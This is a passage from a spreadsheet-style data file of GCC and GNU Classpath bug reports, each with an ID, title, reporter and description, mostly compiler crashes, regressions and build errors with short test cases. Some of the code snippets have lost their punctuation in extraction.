../../../../libstdc++-v3/src/math_stubs_long_double.cc: In function 'long double modfl(long double long double*)':
../../../../libstdc++-v3/src/math_stubs_long_double.cc:172: error: redefinition of 'long double modfl(long double long double*)'
/usr/x86_64-mingw32/include/math.h:187: error: 'long double modfl(long double long double*)' previously defined here
make[4]: *** [math_stubs_long_double.lo] Error 1</t>
  </si>
  <si>
    <t>CLASSPATH-26082</t>
  </si>
  <si>
    <t>HttpURLConnection keep-alive connections are never closed.</t>
  </si>
  <si>
    <t>Using Ethereal I see that a keep-alive connection to a HTTP server is closed after 10 seconds of idle time.
Classpath currently never closes idle connections so the keep taking up resources until the program exits.</t>
  </si>
  <si>
    <t>GCC-26459</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] gcc fails to build on powerpc e500-double targets</t>
  </si>
  <si>
    <t>When configuring gcc with:
--target=powerpc-unknown-linux-gnuspe --host=powerpc-unknown-linux-gnuspe --enable-e500_double
this file will be included:
gcc/config/rs6000/e500-double.h
which in turn uses the variable
rs6000_float_gprs_string
which is not defined anywhere. (So the build stops with undefined sysmbol error)
This problem can be detected as far as 20060206.
Gcc 4.0.2 builds fine with the same configuration options.</t>
  </si>
  <si>
    <t>edmar</t>
  </si>
  <si>
    <t>GCC-39799</t>
  </si>
  <si>
    <t>[4.5 Regression] missing 'may be used uninitialized' warning</t>
  </si>
  <si>
    <t>The following code:
inline int foo(int x)
{
  return x
}
static void bar(int a int *ptr)
{
  do
  {
    int b
    if (b &lt; 40)
    {
      ptr[0] = b
    }
    b += 1
    ptr++
  }
  while (--a != 0)
}
void foobar(int a int *ptr)
{
  bar(foo(a) ptr)
}
generates correct warning when compiled by gcc 4.2.4:
$ gcc -O3 -Wall -Werror -c 1.c
cc1: warnings being treated as errors
1.c: In function â€˜foobarâ€™:
1.c:9: warning: â€˜bâ€™ may be used uninitialized in this function
1.c:9: note: â€˜bâ€™ was declared here
But it compiles without any warning with gcc 4.4.0. The bug reproduces on gcc 4.3.1 as well.</t>
  </si>
  <si>
    <t>GCC-4558</t>
  </si>
  <si>
    <t>-Wall option waring for -2147483648</t>
  </si>
  <si>
    <t>I have a potential problem with GCC -Wall.   I have included relevant lines from the Open Office code:
&gt; typedef signed long         sal_Int32
specific line generating warning is:
static const sal_Int32 DEF_NO = (sal_Int32)-2147483648
Warning is:
../../unxlngi3.pro/inc/com/sun/star/awt/VclWindowPeerAttribute.hdl:42:
warning: decimal integer constant is so large that it is unsigned
From limits.h:
/* Minimum and maximum values a `signed long int' can hold.  */
#  if __WORDSIZE == 64
#   define LONG_MAX    9223372036854775807L
#  else
#   define LONG_MAX    2147483647L
#  endif
#  define LONG_MIN    (-LONG_MAX - 1L)
According to this the value is valid in long arithmetic and also in 'int'
From limits.h:
/* Minimum and maximum values a `signed int' can hold.  */
#  define INT_MIN    (-INT_MAX - 1)
#  define INT_MAX    2147483647
There is a suggestion from Sydney LUG that it is creating the number as a postive 2147483648 and then negating it.  2147483648 is not a valid positive number.  Note how the limits.h actually never does it as one step.
Release:
2.95.4
Environment:
Linux debian Woody (2.4)</t>
  </si>
  <si>
    <t>waratah</t>
  </si>
  <si>
    <t>GCC-65522</t>
  </si>
  <si>
    <t>[5 Regression] Svn revision 221590 fails bootstrap - ../libiberty/libiberty.a(cplus-dem.o): In function `ada_demangle': cplus-dem.c:(.text+0xdb8): multiple definition of `ada_demangle' ada/adadecode.o:adadecode.c:(.text+0x863): first defined here</t>
  </si>
  <si>
    <t>../libiberty/libiberty.a(cplus-dem.o): In function `ada_demangle':
cplus-dem.c:(.text+0xdb8): multiple definition of `ada_demangle'
ada/adadecode.o:adadecode.c:(.text+0x863): first defined here
collect2: error: ld returned 1 exit status
/var/tmp/portage/sys-devel/gcc-4.10.0_pre20150322/work/gcc-4.10.0-20150322/gcc/ada/gcc-interface/Make-lang.in:600: nÃ¡vod pro cÃ­l â€žgnat1â€œ selhal
Revision 221558 was OK.</t>
  </si>
  <si>
    <t>GCC-2665</t>
  </si>
  <si>
    <t>segv with -gstabs option on</t>
  </si>
  <si>
    <t>class OC { int ov = 99 class IC { int iv = ov } }
Put that line in a file OC.java and compile it
gcj -gstabs -S -c OC.java and you get a segv.
Release:
gcc_3_0_branch
Environment:
i686-pc-linux-gnu host/target
How-To-Repeat:
cf descr.</t>
  </si>
  <si>
    <t>alk</t>
  </si>
  <si>
    <t>GCC-59940</t>
  </si>
  <si>
    <t>Imprecise column number for -Wconversion</t>
  </si>
  <si>
    <t>The column numbers of conversion warnings are not precise. 
$: cat s.c
int f(unsigned i)
int g(int i) {
return       f(i) + f(i)
                  + f(i)
}
$: gcc-trunk -c -Wconversion s.c
s.c: In function â€˜gâ€™:
s.c:4:1: warning: conversion to â€˜unsigned intâ€™ from â€˜intâ€™ may change the sign of the result [-Wsign-conversion]
 return       f(i) + f(i)
 ^
s.c:4:1: warning: conversion to â€˜unsigned intâ€™ from â€˜intâ€™ may change the sign of the result [-Wsign-conversion]
s.c:5:19: warning: conversion to â€˜unsigned intâ€™ from â€˜intâ€™ may change the sign of the result [-Wsign-conversion]
                   + f(i)
                   ^
$: clang-trunk -c -Wconversion s.c
s.c:4:16: warning: implicit conversion changes signedness: 'int' to 'unsigned int' [-Wsign-conversion]
return       f(i) + f(i)
             ~ ^
s.c:4:23: warning: implicit conversion changes signedness: 'int' to 'unsigned int' [-Wsign-conversion]
return       f(i) + f(i)
                    ~ ^
s.c:5:23: warning: implicit conversion changes signedness: 'int' to 'unsigned int' [-Wsign-conversion]
                  + f(i)
                    ~ ^
3 warnings generated.
$: gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/home/chengniansun/tools/gcc-trunk-binaries/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --enable-languages=cc++ --disable-multilib --prefix=/home/chengniansun/tools/gcc-trunk-binaries : (reconfigured) ../gcc-trunk/configure --enable-languages=cc++ --disable-multilib --prefix=/home/chengniansun/tools/gcc-trunk-binaries
Thread model: posix
gcc version 4.9.0 20140123 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-1888</t>
  </si>
  <si>
    <t>#if defined(xor) won't work</t>
  </si>
  <si>
    <t>In both RH gcc-2.96.69 and gcc snapshot 2001-02-20 the 
code :
#if defined(xor)
// blah
#endif
is not accepted giving :
defined without an identifier
This is used in the Qt 1.45 headers for one.
Release:
gcc C++ &gt; 2.95.2
Environment:
Linux 2.4 (RedHat 7.0)
How-To-Repeat:
Attempt to compile the code snippet above :
g++ snippet.c</t>
  </si>
  <si>
    <t>moz</t>
  </si>
  <si>
    <t>GCC-28642</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE in layout_type with may_alias and templates</t>
  </si>
  <si>
    <t>attribute((maybe_aliased)) in a union causes ICE</t>
  </si>
  <si>
    <t>apl</t>
  </si>
  <si>
    <t>GCC-83492</t>
  </si>
  <si>
    <t>[7 Regression] Optimized search_line_fast breaks preprocessor on aarch64_be</t>
  </si>
  <si>
    <t>Created attachment 42920
patch to fix search_line_fast for aarch64_be
Running the preprocessor on any source gives various errors on aarch64_be. These suggest that the proprocessor misidentifies token boundaries:
$ echo #define FOO 1 &gt; t.h
$ gcc -nostdinc -E t.h
# 1 t.h
# 1 
# 1 
# 1 t.h
t.h:1:2: error: invalid preprocessing directive #defi
 #define FOO 1
  ^~~~
 FOO 1
$ echo -e \n#include  &gt; t.h
$ gcc -nostdinc -E t.h
# 1 t.h
# 1 
# 1 
# 1 t.h
 &lt;s
efile&gt;
This can be traced to an optimized search_line_fast for aarch64 in libcpp/lex.c which has a special provision for aarch64_be based on the __AARCH64EB. This check can never succeed since the correct name of the macro is __AARCH64EB__. Consequently the code for big-endian aarch64 is never activated:
#ifdef __AARCH64EB
  const int16x8_t shift = {8 8 8 8 0 0 0 0}
#else
  const int16x8_t shift = {0 0 0 0 8 8 8 8}
#endif
As expected changing __AARCH64EB to __AARCH64EB__ or disabling the accelerated routine by substituting search_line_acc_char() fixes the problem.
The offending code is present in current trunk as well: https://gcc.gnu.org/viewcvs/gcc/trunk/libcpp/lex.c?revision=254707&amp;view=markup#l775.
# gcc -v
Using built-in specs.
COLLECT_GCC=/usr/aarch64_be-unknown-linux-gnu/gcc-bin/7.2.0/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/aarch64_be-unknown-linux-gnu/7.2.0/lto-wrapper
Target: aarch64_be-unknown-linux-gnu
Configured with: /usr/aarch64_be-unknown-linux-gnu/tmp/portage/sys-devel/gcc-7.2.0/work/gcc-7.2.0/configure --host=aarch64_be-unknown-linux-gnu --target=aarch64_be-unknown-linux-gnu --build=x86_64-pc-linux-gnu --prefix=/usr --bindir=/usr/aarch64_be-unknown-linux-gnu/gcc-bin/7.2.0 --includedir=/usr/lib/gcc/aarch64_be-unknown-linux-gnu/7.2.0/include --datadir=/usr/share/gcc-data/aarch64_be-unknown-linux-gnu/7.2.0 --mandir=/usr/share/gcc-data/aarch64_be-unknown-linux-gnu/7.2.0/man --infodir=/usr/share/gcc-data/aarch64_be-unknown-linux-gnu/7.2.0/info --with-gxx-include-dir=/usr/lib/gcc/aarch64_be-unknown-linux-gnu/7.2.0/include/g++-v7 --with-python-dir=/share/gcc-data/aarch64_be-unknown-linux-gnu/7.2.0/python --enable-languages=cc++ --enable-obsolete --enable-secureplt --disable-werror --with-system-zlib --disable-nls --enable-checking=release --with-bugurl=https://bugs.gentoo.org/ --with-pkgversion='Gentoo 7.2.0 p1.1' --disable-esp --enable-libstdcxx-time --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-multilib --disable-altivec --disable-fixed-point --disable-libgcj --disable-libgomp --disable-libmudflap --disable-libssp --disable-libcilkrts --disable-libmpx --enable-vtable-verify --enable-libvtv --disable-libquadmath --enable-lto --without-isl --enable-libsanitizer --enable-default-pie --enable-default-ssp --with-native-system-header-dir=/usr/aarch64_be-unknown-linux-gnu/usr/include
Thread model: posix
gcc version 7.2.0 (Gentoo 7.2.0 p1.1)</t>
  </si>
  <si>
    <t>GCC-59678</t>
  </si>
  <si>
    <t>[F03] Segfault on equalizing variables of a complex derived type</t>
  </si>
  <si>
    <t>Hi
Unfortunetely I could not repeat this with a simpler test example. So this code below runs fine with Intel compiler but fails with Gfortan. The is the main file can be replaced in my code from here:
http://sourceforge.net/p/permix/git_pub/ci/master/tree/ 
The minimalitsic serial version can be compiled with 'make minimal_serial'.
program permix
   use permix_cmd_handling_mod
   use prx_class only: ty_prx
   implicit none
   ! ty_prx is a complex derived data type
   type(ty_prx) :: prx prx2
   ! initializing prx
   Call prx_init(prx0'mylog')
   ! running a simulation with giving an input
   call prx%input%job('../verif/Test1/linearelastic_nonsolver.prx ')
   ! prininting a part of the data
   print *prx%parts%parts_fem(1)%OBJ%femmesh%X
   prx2=prx ! ERROR: Segmentation fault occurs here
end program permix
Here is the definition of ty_prx:
    type :: ty_prx
        character(200)                     :: title
        logical                            :: isInit=.false.
        integer                            :: revision=1183
        type(ty_input)                     :: input
        type(ty_part)                      :: parts
        type(ty_interaction)               :: interactions
        type(ty_define)                    :: define
        type(ty_analysis)                  :: analysis
        type(ty_modify)                    :: modify
        type(ty_initial_condition)         :: initial_conditions
        type(ty_solver)                    :: solver
        type(ty_output)                    :: output
        type(ty_tools)                     :: tools
        type(ty_restart)                   :: restart
        type(ty_timer)                     :: timer
        type(ty_universe)                  :: universe
        type(ty_error)                     :: error
        type(ty_prx_pointers)              :: pointers
        contains
            !procedure :: init      =&gt; prx_init
            procedure :: finalize  =&gt; prx_finalize  ! 
    end type ty_prx</t>
  </si>
  <si>
    <t>talebi.hossein</t>
  </si>
  <si>
    <t>GCC-70171</t>
  </si>
  <si>
    <t>Poor code generated when return struct using ternary operator</t>
  </si>
  <si>
    <t>Created attachment 37926
Example C++ code.
Consider the following code:
int int_ternary(int a int b bool select) { return select ? a : b }
int int_if(int a int b bool select) { if (select) return a else return b }
struct S { int i }
S struct_ternary(S a S b bool select) { return select ? a : b }
S struct_if(S a S b bool select) { if (select) return a else return b }
G++ 5.3.0 -O2 generates identical code for int_ternary() int_if() and struct_if() - for x86-64:
	testb	%dl %dl
	movl	%esi %eax
	cmovne	%edi %eax
	ret
However for struct_ternary() it generates terrible code which stores a and b into memory locations and then loads one by address:
struct_ternary(S S bool):
	leaq	-40(%rsp) %rcx
	testb	%dl %dl
	movl	%edi -24(%rsp)
	leaq	-24(%rsp) %rax
	movl	%esi -40(%rsp)
	cmove	%rcx %rax
	movl	(%rax) %eax
	ret
Compile command:
% g++-5 -O2 -S ternary_reference_pessimization.cc
% g++-5 --version
g++-5 (Homebrew gcc 5.3.0) 5.3.0
This can have a major performance impact when using wrappers around built-in types. For example I discovered it experimenting with John McFarlane's fixed_point library which is a candidate for C++ standardization. In particular calling std::max() on two fixed_point values results in the kind of terrible code demonstrated above.
https://github.com/johnmcfarlane/fixed_point/blob/master/doc/p0037r1.md
As wrappers around basic types become more common in C++ the performance impact of this problem will get worse.</t>
  </si>
  <si>
    <t>GCC-44401</t>
  </si>
  <si>
    <t>[4.5/4.6 regression] Doesn't correctly hide injected class name</t>
  </si>
  <si>
    <t>This code is valid but GCC rejects it:
struct X { int X }
int X::*p = 
// error: taking address of constructor 'X::X'
GCC apparently seems to think that X::X looks up to the injected class name and thus (by 3.4.3.1/1a) would name the constructor. But the name of the non-static data member should hide the injected class name.</t>
  </si>
  <si>
    <t>GCC-51727</t>
  </si>
  <si>
    <t>Changing module files</t>
  </si>
  <si>
    <t>Reported at http://gcc.gnu.org/ml/fortran/2011-12/msg00148.html
For a given fortran source file with module(s) repeated compilations may not create always the same module file.  The URL above provides an example.
It seems that the symbols are not output in the same order.  In the example provided there are two module variants the difference between them being that one single symbol is at a different place in the file ( as reported at http://gcc.gnu.org/ml/fortran/2011-12/msg00163.html ).
Possible causes:
 - unitialized memory though valgrind reported nothing for me.
 - tree rebalancing.  Module I/O manages structures to be serialized using a global tree ordered (when writing) by structures' addresses.  Could an unrepeatable order just mean an unrepeatable address?.</t>
  </si>
  <si>
    <t>GCC-11101</t>
  </si>
  <si>
    <t>Kernel compilation error only with 3.3 gcc version</t>
  </si>
  <si>
    <t xml:space="preserve">	Since my gcc version is 3.3 When I compile my linux kernel I have the following error that not appear with th 3.2 version.
	I don't know if the problem is an ice-on-illegal-code with version &lt; 3.2 or an ice-on-legal-code in version 3.3
Environment:
System: Linux cariboo 2.4.20 #1 lun mai 26 18:41:16 CEST 2003 i686 GNU/Linux
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-debug --enable-java-gc=boehm --enable-java-awt=xlib --enable-objc-gc i386-linux
How-To-Repeat:
	This is the error :
	make[3]: Entering directory `/usr/src/linux-2.4.20/drivers/ide'
/usr/bin/make all_targets
make[4]: Entering directory `/usr/src/linux-2.4.20/drivers/ide'
ld -m elf_i386 -r -o ide-mod.o ide.o ide-features.o ide-taskfile.o  ide-adma.o ide-dma.o ide-pci.o via82cxxx.o ide-proc.o
ld -m elf_i386 -r -o ide-probe-mod.o ide-probe.o ide-geometry.o
gcc -D__KERNEL__ -I/usr/src/linux-2.4.20/include -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 -march=athlon    -nostdinc -iwithprefix include -DKBUILD_BASENAME=ide_cd  -c -o ide-cd.o ide-cd.c
In file included from ide-cd.c:318:
ide-cd.h:440: error: long short signed or unsigned used invalidly for `slot_tablelen'
make[4]: *** [ide-cd.o] Erreur 1
make[4]: Leaving directory `/usr/src/linux-2.4.20/drivers/ide'
make[3]: *** [first_rule] Erreur 2
make[3]: Leaving directory `/usr/src/linux-2.4.20/drivers/ide'
make[2]: *** [_subdir_ide] Erreur 2
make[2]: Leaving directory `/usr/src/linux-2.4.20/drivers'
make[1]: *** [_dir_drivers] Erreur 2
make[1]: Leaving directory `/usr/src/linux-2.4.20'
make: *** [stamp-build] Erreur 2</t>
  </si>
  <si>
    <t>lgu3</t>
  </si>
  <si>
    <t>GCC-13</t>
  </si>
  <si>
    <t>error in `const_hash'</t>
  </si>
  <si>
    <t>[Original report in ]
g++ reported an internal error:
meixner@pc2 $ g++ -v --save-temps -c -g -frepo pageserver.cxx -o
lo/pageserver.o
Reading specs from /opt/gnu/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/specs
gcc version 2.95.2 19991024 (release)
 /opt/gnu/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/cpp -lang-c++ -v -D__GNUC__=2
-D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__
-Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux
-Asystem(posix) -D__EXCEPTIONS -g -Acpu(i386) -Amachine(i386) -Di386
-D__i386 -D__i386__ -Di686 -Dpentiumpro -D__i686 -D__i686__ -D__pentiumpro
-D__pentiumpro__ pageserver.cxx pageserver.ii
GNU CPP version 2.95.2 19991024 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /opt/gnu/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../include/g++-3
 /usr/local/include
/opt/gnu/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/../../../../i686-pc-linux-gnu/include
 /opt/gnu/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /opt/gnu/lib/gcc-lib/i686-pc-linux-gnu/2.95.2/cc1plus pageserver.ii -quiet
-dumpbase pageserver.cc -g -version -frepo -o pageserver.s
GNU C++ version 2.95.2 19991024 (release) (i686-pc-linux-gnu) compiled by
GNU C version 2.95.2 19991024 (release).
pageserver.cxx: In method `PageServer::PageServer(int = -1)':
pageserver.cxx:4: class `PageServer' does not have any field named
`event_manager'
pageserver.cxx:5: no matching function for call to
`event_manager::event_manager ()'
event.h:42: candidates are:
event_manager::event_manager(PageServer *)
event.h:59:                 event_manager::event_manager(const
event_manager &amp;)
pageserver.cxx:26: Internal compiler error in `const_hash' at varasm.c:2372
Please submit a full bug report.
See  for
instructions.
The sourcecode has been attached to this EMail.
Regards
	Matthias Meixner
-- 
Matthias Meixner                   meixner@rbg.informatik.tu-darmstadt.de
Technische UniversitÃ¤t Darmstadt
Rechnerbetriebsgruppe                          Telefon (+49) 6151 16 6670
WilhelminenstraÃŸe 7 D-64283 Darmstadt Germany    Fax (+49) 6151 16 4701
Release:
unknown
Environment:
System: Linux mira 2.3.48 #4 Sun Feb 27 23:26:02 CET 2000 i586 unknown
Architecture: i586
How-To-Repeat:
This is a duplicate of 136 and that now has the smaller
test case.</t>
  </si>
  <si>
    <t>GCC-49177</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: gcc.dg/vect/fast-math-ifcvt-1.c</t>
  </si>
  <si>
    <t>On Linux/x86 revision 174290 gave
FAIL: gcc.dg/vect/fast-math-ifcvt-1.c scan-tree-dump vect vectorized 1 loops
Revision 174281 is OK.</t>
  </si>
  <si>
    <t>CLASSPATH-24044</t>
  </si>
  <si>
    <t>Tooltips should have accelerator in text.</t>
  </si>
  <si>
    <t>The accelerators are not shown in the tooltip.</t>
  </si>
  <si>
    <t>GCC-69644</t>
  </si>
  <si>
    <t>ICE with -O on __sync_bool_compare_and_swap with short in extract_insn at recog.c:2286</t>
  </si>
  <si>
    <t>GCC fails with an ICE on the following test case derived from the one in bug 58490.  -O is necessary to trigger it as is the magic constant 0x8000 and the tests.  It looks similar to bug 63805 but the instruction is different.  5.3.0 fails as well.
$ cat t.c &amp;&amp; /build/gcc-trunk/gcc/xgcc -B /build/gcc-trunk/gcc -O -S -Wall -Wextra -Wpedantic t.c
void foo (void)
{
    unsigned short x = 0x8000
    unsigned short y = 0
    char c = __sync_bool_compare_and_swap (
    if (!c) __builtin_abort ()
    if (x != y) __builtin_abort ()
}
t.c: In function â€˜fooâ€™:
t.c:9:1: error: unrecognizable insn:
 }
 ^
(insn 11 10 12 4 (set (reg:CC 163)
        (compare:CC (reg:SI 162)
            (const_int 32768 [0x8000]))) t.c:6 -1
     (nil))
t.c:9:1: internal compiler error: in extract_insn at recog.c:2286
0x10c5ad33 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/src/gcc/trunk/gcc/rtl-error.c:108
0x10c5adab _fatal_insn_not_found(rtx_def const* char const* int char const*)
	/src/gcc/trunk/gcc/rtl-error.c:116
0x10bdf163 extract_insn(rtx_insn*)
	/src/gcc/trunk/gcc/recog.c:2286
0x107d48ff instantiate_virtual_regs_in_insn
	/src/gcc/trunk/gcc/function.c:1582
0x107d668f instantiate_virtual_regs
	/src/gcc/trunk/gcc/function.c:1950
0x107d67ff execute
	/src/gcc/trunk/gcc/function.c:1999
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-3783</t>
  </si>
  <si>
    <t>gcc3.0/ia64 ICE on linux kernel file fs/ufs/super.c</t>
  </si>
  <si>
    <t>gcc3.0 crashes with an internal compiler error on the attached file if -O2 is turned on.  With -O the file compiles fine.
Release:
gcc-3.0
Environment:
- IA-64 Linux
- gcc -v:
Reading specs from /opt/gcc3/lib/gcc-lib/ia64-hp-linux/3.0/specs
Configured with: ../gcc-3.0/configure --host=ia64-hp-linux --enable-threads=posix --prefix=/opt/gcc3
Thread model: posix
gcc version 3.0
How-To-Repeat:
$ gcc -O2 -c super.i
gcc: Internal error: Segmentation fault (program cc1)
Please submit a full bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>davidm</t>
  </si>
  <si>
    <t>GCC-38594</t>
  </si>
  <si>
    <t>[4.4 Regression] module function name mangled improperly if contained function of same name exists</t>
  </si>
  <si>
    <t>$&gt; cat mangle.f90
MODULE m
CONTAINS
  SUBROUTINE g()
  END SUBROUTINE
  SUBROUTINE f()
    CALL g()
  CONTAINS
    SUBROUTINE g()
    END SUBROUTINE
  END SUBROUTINE
END MODULE
  USE m
  CALL g()
END
$&gt; gfortran-svn mangle.f90
/tmp/ccqzRB3z.o: In function `MAIN__':
mangle.f90:(.text+0x2f): undefined reference to `__m_MOD_g'
collect2: ld returned 1 exit status
$&gt; gfortran-svn --version
GNU Fortran (GCC) 4.4.0 20081221 (experimental)
The problem disappears if F and G are reordered in the module or the contained G is removed.</t>
  </si>
  <si>
    <t>GCC-53909</t>
  </si>
  <si>
    <t>internal compiler error: in gimplify_init_ctor_eval at gimplify.c:3560</t>
  </si>
  <si>
    <t>constexpr constructors and multiple inheritance (non-virtual inheritance diamond pattern) don't mix this causes an ICE with gcc 4.6.2 (minimized from production code):
$ g++ -std=c++0x -g -o Bug Bug.cpp
Bug.cpp: In function ?int main()?:
Bug.cpp:10:19: internal compiler error: in gimplify_init_ctor_eval at gimplify.c:3560
struct B { }
struct C1 : B { }
struct C2 : B { }
struct A : C1 C2 {
  constexpr A(int x) { }
}
int main() {
  A a[] = {1 2 3}
  return 0
}
$ g++ --version
g++ (GCC) 4.6.2 20111027 (Red Hat 4.6.2-1)
Copyright (C) 2011 Free Software Foundation Inc.</t>
  </si>
  <si>
    <t>GCC-7183</t>
  </si>
  <si>
    <t>[sparc] structs passed by value are corrupted</t>
  </si>
  <si>
    <t>Pass-by-value of a simple struct causes the struct to get corrupted. The attached code when invoked as described below produces the following output on my Solaris system:
key   = 5
value = 5
now recursing
key   = 135536
value = 70104
now recursing
key   = 16845391
value = 139112
I have not tested other scenarios (non-template etc.)
Release:
3.1
Environment:
Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.1/specs
Configured with: ../configure --with-as=/usr/ccs/bin/as --with-ld=/usr/ccs/bin/ld --disable-nls
Thread model: posix
How-To-Repeat:
instantiate the template as follows:
BugTest mytest(5 5)</t>
  </si>
  <si>
    <t>mark_a_lindner</t>
  </si>
  <si>
    <t>GCC-3909</t>
  </si>
  <si>
    <t>another virtual inheritance crash</t>
  </si>
  <si>
    <t>I tried to compress the cause for the artsd segfaults I am
experiencing into a test case - the attached file should
print out 42 it works with gcc-2.95.4 but crashes with
the 3.0.1 prerelease I tested it with.
Release:
gcc version 3.0.1 20010731 (prerelease)
How-To-Repeat:
c++ arts-testcase-gcc301.cc  a.out</t>
  </si>
  <si>
    <t>GCC-38665</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in check_host_association</t>
  </si>
  <si>
    <t>Error found by Marco Restelli (test case to be uploaded shortly).
gfortran 4.4 fails with
$ gfortran host_assoc.f90
host_assoc.f90:85: internal compiler error: in check_host_association at fortran/resolve.c:4369
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gfortran 4.3.2 works.</t>
  </si>
  <si>
    <t>GCC-48207</t>
  </si>
  <si>
    <t>ICE in lhd_set_decl_assembler_name at langhooks.c:158</t>
  </si>
  <si>
    <t>Created attachment 23727
Testcase (compile with `g++ -flto -g pr48207.cc')</t>
  </si>
  <si>
    <t>GCC-2196</t>
  </si>
  <si>
    <t>Template specialization and LONG_LONG_MAX -&gt; sorry</t>
  </si>
  <si>
    <t>The following legal code generates a sorry not implemented: mangling
very large integers message. Template specializations cause this
message for the long long type if the constant LONG_LONG_MAX from the file
gcc-lib/i686-pc-linux-gnu/3.1/include/limit.h is used as a template parameter.
gcc-3.0 shows the same problem.
Release:
3.1 20010304 (experimental)
Environment:
System: Linux kiste 2.4.2 #34 Sun Feb 25 20:03:34 CET 2001 i686 unknown
Architecture: i686
SuSE 7.1	
GLIBC 2.2
GNU ld version 2.10.91 (with BFD 2.10.1.0.4)
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long
How-To-Repeat:
source code it3.C
#define LONG_LONG_MAX 9223372036854775807LL
#define LONG_LONG_MIN (-LONG_LONG_MAX-1)
template
        class C {}
template C
    { }
int main()
{
}
Compiling the program it3.C
g++ -v -o it3 it3.C -W -Wall -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long
gcc version 3.1 20010304 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=3 -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -W -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ it3.C it3.ii
GNU CPP version 3.1 20010304 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -fpreprocessed it3.ii -quiet -dumpbase it3.C -W -Wall -version -o it3.s
GNU CPP version 3.1 20010304 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20010304 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20010304 (experimental).
it3.C:8: sorry not implemented: mangling very large integers
it3.C:8: parse error before `{' token
Preprocessed source code it3.ii
# 4 it3.C
template
        class C {}
template C
    { }
int main()
{
}
Unformatted:
 &gt;mangling not implemented.</t>
  </si>
  <si>
    <t>GCC-70174</t>
  </si>
  <si>
    <t>[6 Regression] ICE at -O1 and above on x86_64-linux-gnu in gen_lowpart_general at rtlhooks.c:63</t>
  </si>
  <si>
    <t>The following (invalid) code causes an ICE when compiled with the current gcc trunk on x86_64-linux-gnu at -O1 and above in both 32-bit and 64-bit modes.
This is a regression from 5.3.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 6.0.0 20160310 (experimental) [trunk revision 234104] (GCC)
$
$ gcc-trunk -O0 -c small.c
small.c: In function â€˜fn1â€™:
small.c:9:8: warning: assignment makes integer from pointer without a cast [-Wint-conversion]
   a.f0 = fn1
        ^
$ gcc-5.3 -O1 -c small.c
small.c: In function â€˜fn1â€™:
small.c:9:8: warning: assignment makes integer from pointer without a cast [-Wint-conversion]
   a.f0 = fn1
        ^
$
$ gcc-trunk -O1 -c small.c
small.c: In function â€˜fn1â€™:
small.c:9:8: warning: assignment makes integer from pointer without a cast [-Wint-conversion]
   a.f0 = fn1
        ^
small.c:9:8: internal compiler error: in gen_lowpart_general at rtlhooks.c:63
   a.f0 = fn1
   ~~~~~^~~~~
0xb0aea3 gen_lowpart_general(machine_mode rtx_def*)
